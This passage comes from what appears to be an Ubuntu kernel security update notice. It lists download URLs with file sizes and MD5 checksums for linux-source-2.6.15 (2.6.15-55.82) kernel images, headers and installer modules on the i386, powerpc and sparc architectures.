  Size/MD5: 23179552 9b108d16a1fc1716b78c4417150e311e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:    15512 4a2a37534dc2bc6b0ce12df135d07105
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:   238510 544c418a7426a5248e33ff549c6f4035
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:   197134 9ec57cc477f5bc4e0dba11002d3988e5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:  1048370 cd87ff58b5cbea9c04eac21cf1b0784c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:  1741406 0b97758852f283e148ec2ce290e678ef
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:   160884 ce6d2a16b8a3af5706b694fe6f8ac4f5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:     9162 d5f4619ccc32c2ed8296823cd3c19e3e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:    76468 9f0911cef3a4b7afb14f1bd537ad337e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ntfs-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:    53554 afc415fd0a28c363579986fc48464671
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/parport-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:    33048 c710f55e8853bec0935df3338f2370c2
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:    85618 b6ed96be15afaf31e6670a78ff1f4733
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:     6024 b0a622b932e40a7011d5e9ec9bd21eb3
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/plip-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:     8762 6234ceb3aa1422433ee60ad4305c03e7
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:    53636 e1a35b8801fb949295040028cd2cba5e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:   130970 25d88aae6168f72c58ca17584b3f83e0
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:    98468 ddb974591a687460f50c26a2e2682593
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:    77212 a9ec9f2fe551ec07e56200b26f1de4f8
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:  1768830 477e2985e9f1fd2d4f333d651ce07e2f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:    69612 2547b29a65a8391d3a085bbf2ce476aa
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:    11764 88566d97534c428d1ef6b01b5adde2ab
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:    36102 10638cf7adf98d9afcc1e1475dbaf05c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:   132672 fa6f13f8c0c0d017f50dc160bf2961fc
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:    38578 32976528861368cdb936d5db4fc0c2b5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:   299158 458051a07217501718f6e2a742bec0a3

powerpc architecture (Apple Macintosh G3/G4/G5):

http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/affs-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    23726 0fbb9855c5833cb24187a701c10cdfbe
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/affs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    26006 87108baca7e8450f580be0f6c77d95de
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    49328 c6fe9fa1f1e132f4906b21e555bfb079
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    51536 d2c7a02ac033097208c359312e95d246
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:     2308 5b98b064d0e5c18d8c32caa86b2e43e5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:     2482 3c964c577c93d80cee55d06e78003951
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    40306 ad5c5c36d7dc08add999f8cf47d53b72
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    43848 0cfb559dfe56e4a50c99537f98392827
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   112606 9994a8d2bb1c9a45cf43416faca7f9fe
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   120734 092bb2c1dfcece144429a277f96b56e9
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    40906 84f84dc75718a347eb6623204cab6209
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    45996 69f5b1a8a9e82414d868ae459109f32c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    29024 1a12ad8c384bd5195208ce7eb478c011
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    29892 4a807f384985ae3376d509474716f13a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   211398 2e302e02bf08226ad9bf45c3a04840b3
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   225174 0c4edfa7ccdb502d5aefc7b02a2e81e5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    45054 a2373aac90339698b2cba11e43978565
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    40220 06b0e3234fd6b0125df72fc04c4d0562
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fs-common-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:     1934 0887612df6acbc867949c33251427c00
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fs-common-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:     2198 d38a4ec22579275ff2f48805be734356
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/hfs-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    80760 0a71c80867de5b11bd73c9c6d2751448
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/hfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    86134 0531dff0f43a6073ae4e71e93e1d77ce
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   111580 ab42bedd2a1e1687015d5b6b4b327484
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   125734 3c526ccc2348c1f6dd65829c96fb1381
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    53412 13f7a9a412c8c38c4a22a0f4db2a2bd9
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    58486 0a62b4bc8aa5f594de9efc6b9f1dec6a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   147964 9751a30ed03bc5bde2b48be1e5dce6e3
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   161908 70564b18529d383509cb4c1d4898425a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   318412 7944aa213ac28d37d390b48b3d5a9a8d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   288032 2b93681e1b268517863ee4bf27ba0899
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   115862 3cd4a494b7d9652bd77eb9dda6d2eeb9
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   116548 a40033c7a63dda0aa5911caf2dd7f49a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:  1925072 2c1fefed78a6ebc795887a2f27c9db4e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:  2449126 39606af1d24872f0ff053ef5ddf790bd
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-powerpc-smp_2.6.15-55.82_powerpc.deb
  Size/MD5:   872990 d1ced46d4302cb78b2d47c5ea678d6bc
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-powerpc64-smp_2.6.15-55.82_powerpc.deb
  Size/MD5:   872596 8602056ab95806f02667587737cb3b59
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-powerpc_2.6.15-55.82_powerpc.deb
  Size/MD5:   865624 336f5e63d1fc8a9f55e7e36f4177f54a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55_2.6.15-55.82_powerpc.deb
  Size/MD5:  6947694 9ab99966a30e44788549998ae0e26798
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-powerpc-smp_2.6.15-55.82_powerpc.deb
  Size/MD5: 22783922 2c7ace12a48de978cea2e7e939c3c900
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-powerpc64-smp_2.6.15-55.82_powerpc.deb
  Size/MD5: 23693062 18b76996711d54f91edd68a52b45d666
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-powerpc_2.6.15-55.82_powerpc.deb
  Size/MD5: 22365356 f8a73866c9b4334ace774f26ddaa0e38
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    17782 6a4cc5fc57579f3f602f582acb1231fb
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    17386 1abc2376b554610aec23e87f60998358
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   261350 a2a6eff082f29827c9505b45dee47f7d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   282620 93ef7729a3cc9f4639e9d34c8782d8c5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   227808 73c5142c206284bb244b59586a93d8b6
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   248952 d0c1d09bb0b125ae113a70baa7a06cc0
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:  1048470 66d28a86b670f1166faeb1c25a1547ad
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:  1048600 178ea75b2bd02ef3b01c4cf940b6a713
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:  1738490 8fdc1918d06d76e358e7645e24d763b5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:  1878020 0b6e4cc3971bb034e26a3aee110cbc58
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   250814 c48a5e0837fa30e3b1480c113c02d963
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   233524 676bf7f8905001fea721689f23ae5f6e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    13054 73a21ffbe4470fe4108886ee20990c35
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    13528 1105da0ce6deb9d13a19e8b6398827db
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    84794 ccbc384bd76aacf39ac078437d709d51
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    52204 acd012d94fac6fd62028de4920ff5a67
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    73922 a2d1c6a539934c1a852cf0b2c56ada43
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    85854 59c8914383ae0624690950d8f844c101
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:     6624 b926e6807098f087b5eab77015ef1aee
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:     7058 43cb29678a86a4ace2a784ef2c2e8843
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    60378 183583ac6a0ab738109499861a861ca2
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    70420 da9263ada0b850362f022c36b6769f22
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   128550 5eaff599374f099cbb06bb709f1ce68c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   157944 8ef2e5efb4749e8e1725c58a185871bd
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   108166 1a09b1fb98eb414ba847dc8634a28a62
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   126130 e2ae3a3d5d06c8e6a5394c2262381438
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    87294 610a552fd6a9c960f64c8ed4a74c5b39
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    93362 a7434712a48c99eba3cfd1dcdf4db489
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:  2014708 a089ebb3c11c6fd25f65c069adc4f1cb
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:  1988690 049558cbf765292686c49fc8e180ca0f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   104130 cfa3ef8f4085a002160c319cdc9899ed
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   115790 ac0661102201e3f682eda1052d987671
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    12738 f683a291e68f38a5c2785aed5452f77c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    14444 24e22f4de6be23c1fe122e8c3dbdfdc0
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    39950 b8aa9421b4aaf324bc7349b026e3c30e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    41540 c174de599d57427fbbe0544bdea28cf0
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   149344 f742184c85574c83ec84aa70cb9cdfea
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   168082 6f375034031b861fe42ba973c9390ded
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    42310 e24ddfc7d97416cdca5325a9ce197781
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    44918 de0152b64cf3da754a73ba952625e15b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   320326 87594e9f43ab0dff57a8ae731be77dfa
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   324872 a53f9d6f2e8118894b3c5ee8a98b7441

sparc architecture (Sun SPARC/UltraSPARC):

http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
  Size/MD5:    50476 aea13d5d96a87d5b3a0cb897605f8226
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
  Size/MD5:     2358 b0af3cd8de1581e95acdba1dd91796e9
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
  Size/MD5:    40380 c083f0781fb33b64329d10c233affde2
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
  Size/MD5:   110556 cea10ae3446945f5dcc6b94a8050b4ad
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
  Size/MD5:    41214 b0728ed58d1e1a5bcc4309849d773e91
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
  Size/MD5:   104224 54844dc4f0225e051453b6a01934edb3
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
  Size/MD5:     7438 7cfdeca11c465cea2c2e8d768b39969e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
  Size/MD5:   149304 958f0b630326763cddddce5503f3319d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
  Size/MD5:  1712530 f967805acb454413bbcc2f377f5b3e36
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-sparc64-smp_2.6.15-55.82_sparc.deb
  Size/MD5:   773010 979da22c264d122841ea140319b365ce
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-sparc64_2.6.15-55.82_sparc.deb
  Size/MD5:   772604 3106b0711e0e311f93d92624247f1eea
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55_2.6.15-55.82_sparc.deb
  Size/MD5:  6964184 fb615cef69d2a79b16cfda4b67bf4e50
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-sparc64-smp_2.6.15-55.82_sparc.deb
  Size/MD5: 15017856 479231852577fdd0e402556287a02059
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-sparc64_2.6.15-55.82_sparc.deb
  Size/MD5: 14831912 1bd18f6f1ccc6b70379e267a0173b9bb
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
  Size/MD5:     7436 87e52fb1ba93a9e9763a0f3984bc15a5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
  Size/MD5:   248758 bc3db8ee9c85b0aaf1ec03290ae41cf3
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
  Size/MD5:   212566 70a9e482f9be5074d90bbd4ae5cf1246
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
  Size/MD5:  1048480 c535170499441feef6ef8b3062de2d30
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
  Size/MD5:  1482394 247faeb24ed7d02526dc54dfb194dec4
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
  Size/MD5:    10118 28a82b2b4d4934c028952b17676d515a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/parport-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
  Size/MD5:    40178 d44c9cb160749b87062ff38c0fc11340
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/plip-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
  Size/MD5:     9370 c7d50aabcba6ff111825da92f10dd219
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
  Size/MD5:    61398 df892cd2f9e118248246eb7d3c273df4
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
  Size/MD5:   163276 481deef18ee50e039791747737619c3e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
  Size/MD5:    64096 9ebc582fc849cdcf71ee887937313a22
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
  Size/MD5:  1235396 479e0c0baad9c8cf96fe44603c2fb9b9
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
  Size/MD5:    59308 83efde441d0de3f09bb163e53016a300
